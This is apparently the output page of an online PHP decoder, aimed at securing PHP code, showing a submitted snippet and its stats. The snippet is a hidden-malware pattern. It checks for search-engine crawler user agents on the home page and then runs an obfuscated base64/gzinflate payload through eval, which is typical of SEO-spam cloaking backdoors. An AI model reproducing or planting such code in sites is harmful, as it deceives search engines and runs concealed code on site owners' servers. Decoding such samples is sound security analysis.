Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if($_SERVER['REQUEST_URI'] == "/" || $_SERVER['REQUEST_URI'] == "/index.php") { Error_R..

Decoded Output download

<?  if($_SERVER['REQUEST_URI'] == "/" || $_SERVER['REQUEST_URI'] == "/index.php")  
{ 
Error_Reporting(E_ERROR); 
$u=strtolower($_SERVER["HTTP_USER_AGENT"]); 
if (strstr($u,"crawler")or strstr($u,"googlebot")or strstr($u,"msnbot")or strstr($u,"yahoo")or strstr($u,"search")or strstr($u,"bing")or strstr($u,"indexer")or strstr($u,"cuill.com")or strstr($u,"clushbot")) 
{eval(gzinflate(base64_decode('FctND4IgGADgn2PegmWX1iVlmE1qL80PLg2UhgqTTfuwX1+dnz36Ke1KyUlvN7dWN2OrV4GohFGx6eqKWdbDXdCiVxjsKW57TvyrdhEI5GeVMln09lFaw4UdlnNVDIAEEsQwtR4XmRwGTgi+pkOk3XHJK5Al8WPtEFc0mwV9d4DNWOMI2uL/Ic8dTD+nDc4SVnqZu/nBEXwuvPGn67QPwnD3BQ==')));}; 
} ?>

Did this file decode correctly?

Original Code

if($_SERVER['REQUEST_URI'] == "/" || $_SERVER['REQUEST_URI'] == "/index.php") 
{
Error_Reporting(E_ERROR);
$u=strtolower($_SERVER["HTTP_USER_AGENT"]);
if (strstr($u,"crawler")or strstr($u,"googlebot")or strstr($u,"msnbot")or strstr($u,"yahoo")or strstr($u,"search")or strstr($u,"bing")or strstr($u,"indexer")or strstr($u,"cuill.com")or strstr($u,"clushbot"))
{eval(gzinflate(base64_decode('FctND4IgGADgn2PegmWX1iVlmE1qL80PLg2UhgqTTfuwX1+dnz36Ke1KyUlvN7dWN2OrV4GohFGx6eqKWdbDXdCiVxjsKW57TvyrdhEI5GeVMln09lFaw4UdlnNVDIAEEsQwtR4XmRwGTgi+pkOk3XHJK5Al8WPtEFc0mwV9d4DNWOMI2uL/Ic8dTD+nDc4SVnqZu/nBEXwuvPGn67QPwnD3BQ==')));};
}

Function Calls

None

Variables

None

Stats

MD5 b81052820d8674679f6d6b4b0578e2d5
Eval Count 0
Decode Time 111 ms